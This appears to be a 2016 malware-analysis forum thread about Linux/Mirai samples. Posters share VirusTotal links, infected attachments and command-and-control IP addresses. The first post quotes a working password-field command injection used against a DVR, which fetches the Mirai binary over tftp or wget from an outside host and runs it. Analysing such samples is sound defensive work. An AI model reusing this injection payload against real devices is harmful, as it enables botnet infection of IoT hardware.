A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29236  by Xylitol
 Sat Sep 17, 2016 1:28 pm
MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html

Sample from article:
ARM: https://www.virustotal.com/en/file/65de ... 474118654/
ARM7: https://www.virustotal.com/en/file/c483 ... 474118647/
MIPS: https://www.virustotal.com/en/file/9304 ... 474118648/
Renesas SH: https://www.virustotal.com/en/file/1bf9 ... 474118651/
PowerPC: https://www.virustotal.com/en/file/c61b ... 474118650/
SPARC: https://www.virustotal.com/en/file/d957 ... 474118708/
x86: https://www.virustotal.com/en/file/2238 ... 474118710/

And also this
ARM: https://www.virustotal.com/en/file/2727 ... 474117997/
ARM7: https://www.virustotal.com/en/file/a4b9 ... 474118004/
MIPS: https://www.virustotal.com/en/file/f110 ... 474117999/
Renesas SH: https://www.virustotal.com/en/file/b76a ... 474118000/
PowerPC: https://www.virustotal.com/en/file/849d ... 474118001/
The malware was installed on a dvr and was started with this bash injection in password field
Code: Select all
Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
There are also other platform version, change "arm" with "mips" etc..
Thanks to 0x1BE.
Attachments
infected
(185.28 KiB) Downloaded 75 times
infected
(137.68 KiB) Downloaded 80 times
 #29313  by Xylitol
 Sat Oct 01, 2016 9:09 pm
Attachments
infected
(285.09 KiB) Downloaded 67 times
infected
(496.33 KiB) Downloaded 71 times
 #29316  by rkhunter
 Sun Oct 02, 2016 9:44 am
Xylitol wrote:MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html
Frankly speaking, I'm really glad to see that he started to do something directly related to his work, besides war with windmills, "approve" ppl in own twitter and spread rumors about own fantasies.
 #29318  by ikolor
 Sun Oct 02, 2016 10:45 am
connect here

184.51.1.18
184.51.1.19
 #29328  by ikolor
 Mon Oct 03, 2016 12:06 pm
There is any information about sample of competition """Bashlight botnet""".
 #29330  by tWiCe
 Mon Oct 03, 2016 1:50 pm
ikolor wrote:connect here

184.51.1.18
184.51.1.19
Which one is connecting there? I see it's connecting to b0ts.xf0.pw (185.47.62.199)
 #29338  by tWiCe
 Tue Oct 04, 2016 6:56 am
ikolor wrote:Sorry I thought I made mistake .For analyze this file from this website show my this number IP

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/
You can't analyze ELF files on malwr.com, because it doesn't have any Linux VMs, especially for such architectures as MIPS, MIPSEL, PPC, etc.